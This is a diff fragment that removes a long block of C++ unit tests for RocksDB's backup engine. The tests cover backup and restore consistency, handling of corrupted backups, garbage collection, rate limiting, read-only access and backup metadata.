-TEST_P(BackupableDBTestWithParam, OnlineIntegrationTest) {
-  // has to be a big number, so that it triggers the memtable flush
-  const int keys_iteration = 5000;
-  const int max_key = keys_iteration * 4 + 10;
-  Random rnd(7);
-  // delete old data
-  DestroyDB(dbname_, options_);
-
-  OpenDBAndBackupEngine(true);
-  // write some data, backup, repeat
-  for (int i = 0; i < 5; ++i) {
-    if (i == 4) {
-      // delete backup number 2, online delete!
-      ASSERT_OK(backup_engine_->DeleteBackup(2));
-    }
-    // in last iteration, put smaller amount of data,
-    // so that backups can share sst files
-    int fill_up_to = std::min(keys_iteration * (i + 1), max_key);
-    FillDB(db_.get(), keys_iteration * i, fill_up_to);
-    // we should get consistent results with flush_before_backup
-    // set to both true and false
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-  // close and destroy
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-
-  // ---- make sure it's empty ----
-  DB* db = OpenDB();
-  AssertEmpty(db, 0, max_key);
-  delete db;
-
-  // ---- restore every backup and verify all the data is there ----
-  OpenBackupEngine();
-  for (int i = 1; i <= 5; ++i) {
-    if (i == 2) {
-      // we deleted backup 2
-      Status s = backup_engine_->RestoreDBFromBackup(2, dbname_, dbname_);
-      ASSERT_TRUE(!s.ok());
-    } else {
-      int fill_up_to = std::min(keys_iteration * i, max_key);
-      AssertBackupConsistency(i, 0, fill_up_to, max_key);
-    }
-  }
-
-  // delete some backups -- this should leave only backups 3 and 5 alive
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->PurgeOldBackups(2));
-
-  std::vector<BackupInfo> backup_info;
-  backup_engine_->GetBackupInfo(&backup_info);
-  ASSERT_EQ(2UL, backup_info.size());
-
-  // check backup 3
-  AssertBackupConsistency(3, 0, 3 * keys_iteration, max_key);
-  // check backup 5
-  AssertBackupConsistency(5, 0, max_key);
-
-  CloseBackupEngine();
-}
-
-INSTANTIATE_TEST_CASE_P(BackupableDBTestWithParam, BackupableDBTestWithParam,
-                        ::testing::Bool());
-
-// this will make sure that backup does not copy the same file twice
-TEST_F(BackupableDBTest, NoDoubleCopy) {
-  OpenDBAndBackupEngine(true, true);
-
-  // should write 5 DB files + one meta file
-  test_backup_env_->SetLimitWrittenFiles(7);
-  test_backup_env_->ClearWrittenFiles();
-  test_db_env_->SetLimitWrittenFiles(0);
-  dummy_db_->live_files_ = {"/00010.sst", "/00011.sst", "/CURRENT",
-                            "/MANIFEST-01"};
-  dummy_db_->wal_files_ = {{"/00011.log", true}, {"/00012.log", false}};
-  test_db_env_->SetFilenamesForMockedAttrs(dummy_db_->live_files_);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  std::vector<std::string> should_have_written = {
-      "/shared/00010.sst.tmp",    "/shared/00011.sst.tmp",
-      "/private/1.tmp/CURRENT",   "/private/1.tmp/MANIFEST-01",
-      "/private/1.tmp/00011.log", "/meta/1.tmp"};
-  AppendPath(backupdir_, should_have_written);
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  // should write 4 new DB files + one meta file
-  // should not write/copy 00010.sst, since it's already there!
-  test_backup_env_->SetLimitWrittenFiles(6);
-  test_backup_env_->ClearWrittenFiles();
-
-  dummy_db_->live_files_ = {"/00010.sst", "/00015.sst", "/CURRENT",
-                            "/MANIFEST-01"};
-  dummy_db_->wal_files_ = {{"/00011.log", true}, {"/00012.log", false}};
-  test_db_env_->SetFilenamesForMockedAttrs(dummy_db_->live_files_);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  // should not open 00010.sst - it's already there
-
-  should_have_written = {"/shared/00015.sst.tmp", "/private/2.tmp/CURRENT",
-                         "/private/2.tmp/MANIFEST-01",
-                         "/private/2.tmp/00011.log", "/meta/2.tmp"};
-  AppendPath(backupdir_, should_have_written);
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  ASSERT_OK(backup_engine_->DeleteBackup(1));
-  ASSERT_OK(test_backup_env_->FileExists(backupdir_ + "/shared/00010.sst"));
-
-  // 00011.sst was only in backup 1, should be deleted
-  ASSERT_EQ(Status::NotFound(),
-            test_backup_env_->FileExists(backupdir_ + "/shared/00011.sst"));
-  ASSERT_OK(test_backup_env_->FileExists(backupdir_ + "/shared/00015.sst"));
-
-  // MANIFEST file size should be only 100
-  uint64_t size;
-  test_backup_env_->GetFileSize(backupdir_ + "/private/2/MANIFEST-01", &size);
-  ASSERT_EQ(100UL, size);
-  test_backup_env_->GetFileSize(backupdir_ + "/shared/00015.sst", &size);
-  ASSERT_EQ(200UL, size);
-
-  CloseDBAndBackupEngine();
-}
-
-// test various kind of corruptions that may happen:
-// 1. Not able to write a file for backup - that backup should fail,
-//      everything else should work
-// 2. Corrupted backup meta file or missing backuped file - we should
-//      not be able to open that backup, but all other backups should be
-//      fine
-// 3. Corrupted checksum value - if the checksum is not a valid uint32_t,
-//      db open should fail, otherwise, it aborts during the restore process.
-TEST_F(BackupableDBTest, CorruptionsTest) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-
-  // ---------- case 1. - fail a write -----------
-  // try creating backup 6, but fail a write
-  FillDB(db_.get(), keys_iteration * 5, keys_iteration * 6);
-  test_backup_env_->SetLimitWrittenFiles(2);
-  // should fail
-  s = backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2));
-  ASSERT_TRUE(!s.ok());
-  test_backup_env_->SetLimitWrittenFiles(1000000);
-  // latest backup should have all the keys
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration * 5, keys_iteration * 6);
-
-  // --------- case 2. corrupted backup meta or missing backuped file ----
-  ASSERT_OK(file_manager_->CorruptFile(backupdir_ + "/meta/5", 3));
-  // since 5 meta is now corrupted, latest backup should be 4
-  AssertBackupConsistency(0, 0, keys_iteration * 4, keys_iteration * 5);
-  OpenBackupEngine();
-  s = backup_engine_->RestoreDBFromBackup(5, dbname_, dbname_);
-  ASSERT_TRUE(!s.ok());
-  CloseBackupEngine();
-  ASSERT_OK(file_manager_->DeleteRandomFileInDir(backupdir_ + "/private/4"));
-  // 4 is corrupted, 3 is the latest backup now
-  AssertBackupConsistency(0, 0, keys_iteration * 3, keys_iteration * 5);
-  OpenBackupEngine();
-  s = backup_engine_->RestoreDBFromBackup(4, dbname_, dbname_);
-  CloseBackupEngine();
-  ASSERT_TRUE(!s.ok());
-
-  // --------- case 3. corrupted checksum value ----
-  ASSERT_OK(file_manager_->CorruptChecksum(backupdir_ + "/meta/3", false));
-  // checksum of backup 3 is an invalid value, this can be detected at
-  // db open time, and it reverts to the previous backup automatically
-  AssertBackupConsistency(0, 0, keys_iteration * 2, keys_iteration * 5);
-  // checksum of the backup 2 appears to be valid, this can cause checksum
-  // mismatch and abort restore process
-  ASSERT_OK(file_manager_->CorruptChecksum(backupdir_ + "/meta/2", true));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  OpenBackupEngine();
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  s = backup_engine_->RestoreDBFromBackup(2, dbname_, dbname_);
-  ASSERT_TRUE(!s.ok());
-
-  // make sure that no corrupt backups have actually been deleted!
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/1"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/2"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/3"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/4"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/1"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/2"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/3"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/4"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/5"));
-
-  // delete the corrupt backups and then make sure they're actually deleted
-  ASSERT_OK(backup_engine_->DeleteBackup(5));
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->DeleteBackup(3));
-  ASSERT_OK(backup_engine_->DeleteBackup(2));
-  (void)backup_engine_->GarbageCollect();
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/5"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/4"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/4"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/3"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/3"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/meta/2"));
-  ASSERT_EQ(Status::NotFound(),
-            file_manager_->FileExists(backupdir_ + "/private/2"));
-
-  CloseBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration * 1, keys_iteration * 5);
-
-  // new backup should be 2!
-  OpenDBAndBackupEngine();
-  FillDB(db_.get(), keys_iteration * 1, keys_iteration * 2);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(2, 0, keys_iteration * 2, keys_iteration * 5);
-}
-
-TEST_F(BackupableDBTest, InterruptCreationTest) {
-  // Interrupt backup creation by failing new writes and failing cleanup of the
-  // partial state. Then verify a subsequent backup can still succeed.
-  const int keys_iteration = 5000;
-  Random rnd(6);
-
-  OpenDBAndBackupEngine(true /* destroy_old_data */);
-  FillDB(db_.get(), 0, keys_iteration);
-  test_backup_env_->SetLimitWrittenFiles(2);
-  test_backup_env_->SetDeleteFileFailure(true);
-  // should fail creation
-  ASSERT_FALSE(
-      backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)).ok());
-  CloseDBAndBackupEngine();
-  // should also fail cleanup so the tmp directory stays behind
-  ASSERT_OK(backup_chroot_env_->FileExists(backupdir_ + "/private/1.tmp/"));
-
-  OpenDBAndBackupEngine(false /* destroy_old_data */);
-  test_backup_env_->SetLimitWrittenFiles(1000000);
-  test_backup_env_->SetDeleteFileFailure(false);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  // latest backup should have all the keys
-  CloseDBAndBackupEngine();
-  AssertBackupConsistency(0, 0, keys_iteration);
-}
-
-inline std::string OptionsPath(std::string ret, int backupID) {
-  ret += "/private/";
-  ret += std::to_string(backupID);
-  ret += "/";
-  return ret;
-}
-
-// Backup the LATEST options file to
-// "<backup_dir>/private/<backup_id>/OPTIONS<number>"
-
-TEST_F(BackupableDBTest, BackupOptions) {
-  OpenDBAndBackupEngine(true);
-  for (int i = 1; i < 5; i++) {
-    std::string name;
-    std::vector<std::string> filenames;
-    // Must reset() before reset(OpenDB()) again.
-    // Calling OpenDB() while *db_ is existing will cause LOCK issue
-    db_.reset();
-    db_.reset(OpenDB());
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-    rocksdb::GetLatestOptionsFileName(db_->GetName(), options_.env, &name);
-    ASSERT_OK(file_manager_->FileExists(OptionsPath(backupdir_, i) + name));
-    backup_chroot_env_->GetChildren(OptionsPath(backupdir_, i), &filenames);
-    for (auto fn : filenames) {
-      if (fn.compare(0, 7, "OPTIONS") == 0) {
-        ASSERT_EQ(name, fn);
-      }
-    }
-  }
-
-  CloseDBAndBackupEngine();
-}
-
-// This test verifies we don't delete the latest backup when read-only option is
-// set
-TEST_F(BackupableDBTest, NoDeleteWithReadOnly) {
-  const int keys_iteration = 5000;
-  Random rnd(6);
-  Status s;
-
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(rnd.Next() % 2)));
-  }
-  CloseDBAndBackupEngine();
-  ASSERT_OK(file_manager_->WriteToFile(backupdir_ + "/LATEST_BACKUP", "4"));
-
-  backupable_options_->destroy_old_data = false;
-  BackupEngineReadOnly* read_only_backup_engine;
-  ASSERT_OK(BackupEngineReadOnly::Open(backup_chroot_env_.get(),
-                                       *backupable_options_,
-                                       &read_only_backup_engine));
-
-  // assert that data from backup 5 is still here (even though LATEST_BACKUP
-  // says 4 is latest)
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/meta/5"));
-  ASSERT_OK(file_manager_->FileExists(backupdir_ + "/private/5"));
-
-  // Behavior change: We now ignore LATEST_BACKUP contents. This means that
-  // we should have 5 backups, even if LATEST_BACKUP says 4.
-  std::vector<BackupInfo> backup_info;
-  read_only_backup_engine->GetBackupInfo(&backup_info);
-  ASSERT_EQ(5UL, backup_info.size());
-  delete read_only_backup_engine;
-}
-
-TEST_F(BackupableDBTest, FailOverwritingBackups) {
-  options_.write_buffer_size = 1024 * 1024 * 1024;  // 1GB
-  options_.disable_auto_compactions = true;
-
-  // create backups 1, 2, 3, 4, 5
-  OpenDBAndBackupEngine(true);
-  for (int i = 0; i < 5; ++i) {
-    CloseDBAndBackupEngine();
-    DeleteLogFiles();
-    OpenDBAndBackupEngine(false);
-    FillDB(db_.get(), 100 * i, 100 * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  // restore 3
-  OpenBackupEngine();
-  ASSERT_OK(backup_engine_->RestoreDBFromBackup(3, dbname_, dbname_));
-  CloseBackupEngine();
-
-  OpenDBAndBackupEngine(false);
-  FillDB(db_.get(), 0, 300);
-  Status s = backup_engine_->CreateNewBackup(db_.get(), true);
-  // the new backup fails because new table files
-  // clash with old table files from backups 4 and 5
-  // (since write_buffer_size is huge, we can be sure that
-  // each backup will generate only one sst file and that
-  // a file generated by a new backup is the same as
-  // sst file generated by backup 4)
-  ASSERT_TRUE(s.IsCorruption());
-  ASSERT_OK(backup_engine_->DeleteBackup(4));
-  ASSERT_OK(backup_engine_->DeleteBackup(5));
-  // now, the backup can succeed
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  CloseDBAndBackupEngine();
-}
-
-TEST_F(BackupableDBTest, NoShareTableFiles) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngine(true, false, false);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(i % 2)));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-}
-
-// Verify that you can backup and restore with share_files_with_checksum on
-TEST_F(BackupableDBTest, ShareTableFilesWithChecksums) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, true);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), !!(i % 2)));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-}
-
-// Verify that you can backup and restore using share_files_with_checksum set to
-// false and then transition this option to true
-TEST_F(BackupableDBTest, ShareTableFilesWithChecksumsTransition) {
-  const int keys_iteration = 5000;
-  // set share_files_with_checksum to false
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, false);
-  for (int i = 0; i < 5; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 1),
-                            keys_iteration * 6);
-  }
-
-  // set share_files_with_checksum to true and do some more backups
-  OpenDBAndBackupEngineShareWithChecksum(true, false, true, true);
-  for (int i = 5; i < 10; ++i) {
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  }
-  CloseDBAndBackupEngine();
-
-  for (int i = 0; i < 5; ++i) {
-    AssertBackupConsistency(i + 1, 0, keys_iteration * (i + 5 + 1),
-                            keys_iteration * 11);
-  }
-}
-
-TEST_F(BackupableDBTest, DeleteTmpFiles) {
-  for (bool shared_checksum : {false, true}) {
-    if (shared_checksum) {
-      OpenDBAndBackupEngineShareWithChecksum(
-          false /* destroy_old_data */, false /* dummy */,
-          true /* share_table_files */, true /* share_with_checksums */);
-    } else {
-      OpenDBAndBackupEngine();
-    }
-    CloseDBAndBackupEngine();
-    std::string shared_tmp = backupdir_;
-    if (shared_checksum) {
-      shared_tmp += "/shared_checksum";
-    } else {
-      shared_tmp += "/shared";
-    }
-    shared_tmp += "/00006.sst.tmp";
-    std::string private_tmp_dir = backupdir_ + "/private/10.tmp";
-    std::string private_tmp_file = private_tmp_dir + "/00003.sst";
-    file_manager_->WriteToFile(shared_tmp, "tmp");
-    file_manager_->CreateDir(private_tmp_dir);
-    file_manager_->WriteToFile(private_tmp_file, "tmp");
-    ASSERT_OK(file_manager_->FileExists(private_tmp_dir));
-    if (shared_checksum) {
-      OpenDBAndBackupEngineShareWithChecksum(
-          false /* destroy_old_data */, false /* dummy */,
-          true /* share_table_files */, true /* share_with_checksums */);
-    } else {
-      OpenDBAndBackupEngine();
-    }
-    // Need to call this explicitly to delete tmp files
-    (void)backup_engine_->GarbageCollect();
-    CloseDBAndBackupEngine();
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(shared_tmp));
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(private_tmp_file));
-    ASSERT_EQ(Status::NotFound(), file_manager_->FileExists(private_tmp_dir));
-  }
-}
-
-TEST_F(BackupableDBTest, KeepLogFiles) {
-  backupable_options_->backup_log_files = false;
-  // basically infinite
-  options_.WAL_ttl_seconds = 24 * 60 * 60;
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 100, 200);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-  FillDB(db_.get(), 200, 300);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 300, 400);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  FillDB(db_.get(), 400, 500);
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  CloseDBAndBackupEngine();
-
-  // all data should be there if we call with keep_log_files = true
-  AssertBackupConsistency(0, 0, 500, 600, true);
-}
-
-TEST_F(BackupableDBTest, RateLimiting) {
-  size_t const kMicrosPerSec = 1000 * 1000LL;
-  uint64_t const MB = 1024 * 1024;
-
-  const std::vector<std::pair<uint64_t, uint64_t>> limits(
-      {{1 * MB, 5 * MB}, {2 * MB, 3 * MB}});
-
-  std::shared_ptr<RateLimiter> backupThrottler(NewGenericRateLimiter(1));
-  std::shared_ptr<RateLimiter> restoreThrottler(NewGenericRateLimiter(1));
-
-  for (bool makeThrottler : {false, true}) {
-    if (makeThrottler) {
-      backupable_options_->backup_rate_limiter = backupThrottler;
-      backupable_options_->restore_rate_limiter = restoreThrottler;
-    }
-    // iter 0 -- single threaded
-    // iter 1 -- multi threaded
-    for (int iter = 0; iter < 2; ++iter) {
-      for (const auto& limit : limits) {
-        // destroy old data
-        DestroyDB(dbname_, Options());
-        if (makeThrottler) {
-          backupThrottler->SetBytesPerSecond(limit.first);
-          restoreThrottler->SetBytesPerSecond(limit.second);
-        } else {
-          backupable_options_->backup_rate_limit = limit.first;
-          backupable_options_->restore_rate_limit = limit.second;
-        }
-        backupable_options_->max_background_operations = (iter == 0) ? 1 : 10;
-        options_.compression = kNoCompression;
-        OpenDBAndBackupEngine(true);
-        size_t bytes_written = FillDB(db_.get(), 0, 100000);
-
-        auto start_backup = db_chroot_env_->NowMicros();
-        ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-        auto backup_time = db_chroot_env_->NowMicros() - start_backup;
-        auto rate_limited_backup_time =
-            (bytes_written * kMicrosPerSec) / limit.first;
-        ASSERT_GT(backup_time, 0.8 * rate_limited_backup_time);
-
-        CloseDBAndBackupEngine();
-
-        OpenBackupEngine();
-        auto start_restore = db_chroot_env_->NowMicros();
-        ASSERT_OK(backup_engine_->RestoreDBFromLatestBackup(dbname_, dbname_));
-        auto restore_time = db_chroot_env_->NowMicros() - start_restore;
-        CloseBackupEngine();
-        auto rate_limited_restore_time =
-            (bytes_written * kMicrosPerSec) / limit.second;
-        ASSERT_GT(restore_time, 0.8 * rate_limited_restore_time);
-
-        AssertBackupConsistency(0, 0, 100000, 100010);
-      }
-    }
-  }
-}
-
-TEST_F(BackupableDBTest, ReadOnlyBackupEngine) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  FillDB(db_.get(), 100, 200);
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), true));
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-
-  backupable_options_->destroy_old_data = false;
-  test_backup_env_->ClearWrittenFiles();
-  test_backup_env_->SetLimitDeleteFiles(0);
-  BackupEngineReadOnly* read_only_backup_engine;
-  ASSERT_OK(BackupEngineReadOnly::Open(
-      db_chroot_env_.get(), *backupable_options_, &read_only_backup_engine));
-  std::vector<BackupInfo> backup_info;
-  read_only_backup_engine->GetBackupInfo(&backup_info);
-  ASSERT_EQ(backup_info.size(), 2U);
-
-  RestoreOptions restore_options(false);
-  ASSERT_OK(read_only_backup_engine->RestoreDBFromLatestBackup(
-      dbname_, dbname_, restore_options));
-  delete read_only_backup_engine;
-  std::vector<std::string> should_have_written;
-  test_backup_env_->AssertWrittenFiles(should_have_written);
-
-  DB* db = OpenDB();
-  AssertExists(db, 0, 200);
-  delete db;
-}
-
-TEST_F(BackupableDBTest, ProgressCallbackDuringBackup) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-  bool is_callback_invoked = false;
-  ASSERT_OK(backup_engine_->CreateNewBackup(
-      db_.get(), true,
-      [&is_callback_invoked]() { is_callback_invoked = true; }));
-
-  ASSERT_TRUE(is_callback_invoked);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, GarbageCollectionBeforeBackup) {
-  DestroyDB(dbname_, options_);
-  OpenDBAndBackupEngine(true);
-
-  backup_chroot_env_->CreateDirIfMissing(backupdir_ + "/shared");
-  std::string file_five = backupdir_ + "/shared/000007.sst";
-  std::string file_five_contents = "I'm not really a sst file";
-  // this depends on the fact that 00007.sst is the first file created by the DB
-  ASSERT_OK(file_manager_->WriteToFile(file_five, file_five_contents));
-
-  FillDB(db_.get(), 0, 100);
-  // backup overwrites file 000007.sst
-  ASSERT_TRUE(backup_engine_->CreateNewBackup(db_.get(), true).ok());
-
-  std::string new_file_five_contents;
-  ASSERT_OK(ReadFileToString(backup_chroot_env_.get(), file_five,
-                             &new_file_five_contents));
-  // file 000007.sst was overwritten
-  ASSERT_TRUE(new_file_five_contents != file_five_contents);
-
-  CloseDBAndBackupEngine();
-
-  AssertBackupConsistency(0, 0, 100);
-}
-
-// Test that we properly propagate Env failures
-TEST_F(BackupableDBTest, EnvFailures) {
-  BackupEngine* backup_engine;
-
-  // get children failure
-  {
-    test_backup_env_->SetGetChildrenFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetGetChildrenFailure(false);
-  }
-
-  // created dir failure
-  {
-    test_backup_env_->SetCreateDirIfMissingFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetCreateDirIfMissingFailure(false);
-  }
-
-  // new directory failure
-  {
-    test_backup_env_->SetNewDirectoryFailure(true);
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetNewDirectoryFailure(false);
-  }
-
-  // Read from meta-file failure
-  {
-    DestroyDB(dbname_, options_);
-    OpenDBAndBackupEngine(true);
-    FillDB(db_.get(), 0, 100);
-    ASSERT_TRUE(backup_engine_->CreateNewBackup(db_.get(), true).ok());
-    CloseDBAndBackupEngine();
-    test_backup_env_->SetDummySequentialFile(true);
-    test_backup_env_->SetDummySequentialFileFailReads(true);
-    backupable_options_->destroy_old_data = false;
-    ASSERT_NOK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                  &backup_engine));
-    test_backup_env_->SetDummySequentialFile(false);
-    test_backup_env_->SetDummySequentialFileFailReads(false);
-  }
-
-  // no failure
-  {
-    ASSERT_OK(BackupEngine::Open(test_db_env_.get(), *backupable_options_,
-                                 &backup_engine));
-    delete backup_engine;
-  }
-}
-
-// Verify manifest can roll while a backup is being created with the old
-// manifest.
-TEST_F(BackupableDBTest, ChangeManifestDuringBackupCreation) {
-  DestroyDB(dbname_, options_);
-  options_.max_manifest_file_size = 0;  // always rollover manifest for file add
-  OpenDBAndBackupEngine(true);
-  FillDB(db_.get(), 0, 100);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-       "VersionSet::LogAndApply:WriteManifest"},
-      {"VersionSet::LogAndApply:WriteManifestDone",
-       "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread flush_thread{[this]() { ASSERT_OK(db_->Flush(FlushOptions())); }};
-
-  ASSERT_OK(backup_engine_->CreateNewBackup(db_.get(), false));
-
-  flush_thread.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // The last manifest roll would've already been cleaned up by the full scan
-  // that happens when CreateNewBackup invokes EnableFileDeletions. We need to
-  // trigger another roll to verify non-full scan purges stale manifests.
-  DBImpl* db_impl = reinterpret_cast<DBImpl*>(db_.get());
-  std::string prev_manifest_path =
-      DescriptorFileName(dbname_, db_impl->TEST_Current_Manifest_FileNo());
-  FillDB(db_.get(), 0, 100);
-  ASSERT_OK(db_chroot_env_->FileExists(prev_manifest_path));
-  ASSERT_OK(db_->Flush(FlushOptions()));
-  ASSERT_TRUE(db_chroot_env_->FileExists(prev_manifest_path).IsNotFound());
-
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-  AssertBackupConsistency(0, 0, 100);
-}
-
-// see https://github.com/facebook/rocksdb/issues/921
-TEST_F(BackupableDBTest, Issue921Test) {
-  BackupEngine* backup_engine;
-  backupable_options_->share_table_files = false;
-  backup_chroot_env_->CreateDirIfMissing(backupable_options_->backup_dir);
-  backupable_options_->backup_dir += "/new_dir";
-  ASSERT_OK(BackupEngine::Open(backup_chroot_env_.get(), *backupable_options_,
-                               &backup_engine));
-
-  delete backup_engine;
-}
-
-TEST_F(BackupableDBTest, BackupWithMetadata) {
-  const int keys_iteration = 5000;
-  OpenDBAndBackupEngine(true);
-  // create five backups
-  for (int i = 0; i < 5; ++i) {
-    const std::string metadata = std::to_string(i);
-    FillDB(db_.get(), keys_iteration * i, keys_iteration * (i + 1));
-    ASSERT_OK(
-        backup_engine_->CreateNewBackupWithMetadata(db_.get(), metadata, true));
-  }
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(5, backup_infos.size());
-  for (int i = 0; i < 5; i++) {
-    ASSERT_EQ(std::to_string(i), backup_infos[i].app_metadata);
-  }
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, BinaryMetadata) {
-  OpenDBAndBackupEngine(true);
-  std::string binaryMetadata = "abc\ndef";
-  binaryMetadata.push_back('\0');
-  binaryMetadata.append("ghi");
-  ASSERT_OK(
-      backup_engine_->CreateNewBackupWithMetadata(db_.get(), binaryMetadata));
-  CloseDBAndBackupEngine();
-
-  OpenDBAndBackupEngine();
-  std::vector<BackupInfo> backup_infos;
-  backup_engine_->GetBackupInfo(&backup_infos);
-  ASSERT_EQ(1, backup_infos.size());
-  ASSERT_EQ(binaryMetadata, backup_infos[0].app_metadata);
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
-TEST_F(BackupableDBTest, MetadataTooLarge) {
-  OpenDBAndBackupEngine(true);
-  std::string largeMetadata(1024 * 1024 + 1, 0);
-  ASSERT_NOK(
-      backup_engine_->CreateNewBackupWithMetadata(db_.get(), largeMetadata));
-  CloseDBAndBackupEngine();
-  DestroyDB(dbname_, options_);
-}
-
